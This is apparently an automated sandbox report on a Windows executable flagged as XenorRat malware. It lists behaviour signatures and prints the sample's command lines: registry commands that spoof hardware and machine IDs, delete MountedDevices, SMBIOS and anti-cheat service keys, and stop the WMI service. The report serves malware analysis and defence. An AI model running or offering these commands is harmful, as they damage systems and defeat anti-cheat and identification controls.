Analysis Overview
SHA256
66f635bf805463c4a83b969ac8d4cc563b2feadaea0460dc22c5f53be72a9223
Threat Level: Known bad
The file InternalLoader v2.exe was found to be: Known bad.
Malicious Activity Summary
XenorRat
Deletes shadow copies
Sets service image path in registry
Downloads MZ/PE file
Stops running service(s)
Drops file in Drivers directory
Checks computer location settings
Executes dropped EXE
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Drops file in System32 directory
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
Enumerates system info in registry
Runs net.exe
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Uses Volume Shadow Copy service COM API
Modifies registry key
Gathers network information
Interacts with shadow copies
Suspicious behavior: LoadsDriver
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-05-30 11:22
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-30 11:22
Reported
2024-05-30 11:25
Platform
win10v2004-20240508-en
Max time kernel
127s
Max time network
149s
Command Line
Signatures
XenorRat
Deletes shadow copies
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\spotifyHResultInstaller.sys | C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe | N/A |
| File created | C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe | C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\dQDbesygfrMwuPmZJIv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\dQDbesygfrMwuPmZJIv" | C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\frAQBc8Wsa1xVPfv\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\frAQBc8Wsa1xVPfv" | C:\Users\Default\AppData\Roaming\injector.exe | N/A |
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\InternalLoader v2.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2539840389-1261165778-1087677076-1000\Control Panel\International\Geo\Nation | C:\Users\Default\AppData\Roaming\injector.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe | N/A |
| N/A | N/A | C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe | N/A |
| N/A | N/A | C:\Users\Default\AppData\Roaming\injector.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\F: | C:\Windows\system32\fsutil.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\system32\fsutil.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\system32\fsutil.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\wbem\repository\OBJECTS.DATA | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\INDEX.BTR | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\WRITABLE.TST | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING1.MAP | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING2.MAP | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\wbem\repository\MAPPING3.MAP | C:\Windows\system32\svchost.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\reg.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\reg.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\reg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 | C:\Windows\system32\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0\Identifier = "2787620314-2172020521-1728624429" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 | C:\Windows\system32\reg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1\Identifier = "2787620314-2172020521-1728624429" | C:\Windows\system32\reg.exe | N/A |
Gathers network information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\ipconfig.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
Modifies registry key
Runs net.exe
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe | N/A |
| N/A | N/A | C:\Users\Default\AppData\Roaming\injector.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\InternalLoader v2.exe
"C:\Users\Admin\AppData\Local\Temp\InternalLoader v2.exe"
C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe" MD5 | find /i /v "md5" | find /i /v "certutil"
C:\Windows\system32\certutil.exe
certutil -hashfile "C:\Users\Admin\AppData\Local\Temp\RarSFX0\InternalLoader2.exe" MD5
C:\Windows\system32\find.exe
find /i /v "md5"
C:\Windows\system32\find.exe
find /i /v "certutil"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe C:\Windows\System32\drivers\spotifyHResultInstaller.sys
C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe
C:\Windows\System32\drivers\etc\spotifyHResultInstaller.exe C:\Windows\System32\drivers\spotifyHResultInstaller.sys
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName /v ComputerName /t REG_SZ /d 27876 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d %Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ActiveComputerName /v ComputerName /t REG_SZ /d 27876 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareId /t REG_SZ /d {2787620314-2172020521-1728624429} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SystemInformation /v ComputerHardwareIds /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware" "Profiles\0001 /v HwProfileGuid /t REG_SZ /d {2787620314-2172020521-1728624429} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v MachineId /t REG_SZ /d {2787620314-2172020521-1728624429} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\SQMClient /v WinSqmFirstSessionStartTime /t REG_QWORD /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallTime /t REG_QWORD /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v InstallDate /t REG_QWORD /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Cryptography /v GUID /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\HardwareConfig /v LastConfig /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v ClientUUID /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global /v PersistenceIdentifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\NVIDIA" "Corporation\Global\CoProcManager /v ChipsetMatchID /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "0\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\HARDWARE\DEVICEMAP\Scsi\Scsi" "Port" "1\Scsi" "Bus" "0\Target" "Id" "0\Logical" "Unit" "Id" "0 /v Identifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0 /v Identifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1 /v Identifier /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\ControlSet001\Services\BasicDisplay\Video /v VideoID /t REG_SZ /d {2787620314-2172020521-1728624429} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v Hostname /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\System\CurrentControlSet\Services\Tcpip\Parameters /v Domain /t REG_SZ /d 2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d%Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\System\CurrentControlSet\Control\DevQuery\6 /v UUID /t REG_SZ /d2787620314-2172020521-1728624429 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /v NV" "Hostname /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v ProductId /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f >nul
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildGUID /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLab /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\Software\Microsoft /v BuildLabEx /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v AccountDomainSid /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v PingID /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate /v SusClientId /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion\Tracing\Microsoft\Profile\Profile /v Guid /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOwner /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v RegisteredOrganization /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v BuildBranch /t REG_SZ /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId /t REG_BINARY /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d %Random%%Random%-%Random%%Random%-%Random%%Random% /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SOFTWARE\Microsoft\Windows" "NT\CurrentVersion /v DigitalProductId4 /t REG_BINARY /d 2787931063-681611817-2760128356 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\ControlSet001\Services\kbdclass\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {2787931063-681611817-2760128356} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {%Random%%Random%-%Random%%Random%-%Random%%Random%} /f
C:\Windows\system32\reg.exe
REG ADD HKLM\SYSTEM\ControlSet001\Services\mouhid\Parameters /v WppRecorder_TraceGuid /t REG_SZ /d {2787931063-681611817-2760128356} /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\MountedDevices /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\MountedDevices /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
C:\Windows\system32\reg.exe
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
C:\Windows\system32\reg.exe
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
C:\Windows\system32\reg.exe
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
C:\Windows\system32\reg.exe
REG DELETE HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\BitBucket /v LastEnum /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SOFTWARE\Microsoft\Dfrg\Statistics /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v AcpiData /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v BiosData /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v RegistersData /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\mssmbios\Data /v SMBiosData /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0 /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\ControlSet001\Services\EasyAntiCheat /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c REG DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
C:\Windows\system32\reg.exe
REG DELETE HKLM\SYSTEM\ControlSet001\Services\BEService /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc stop winmgmt >nul
C:\Windows\system32\sc.exe
sc stop winmgmt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c sc start winmgmt >nul
C:\Windows\system32\sc.exe
sc start winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop winmgmt /y >nul
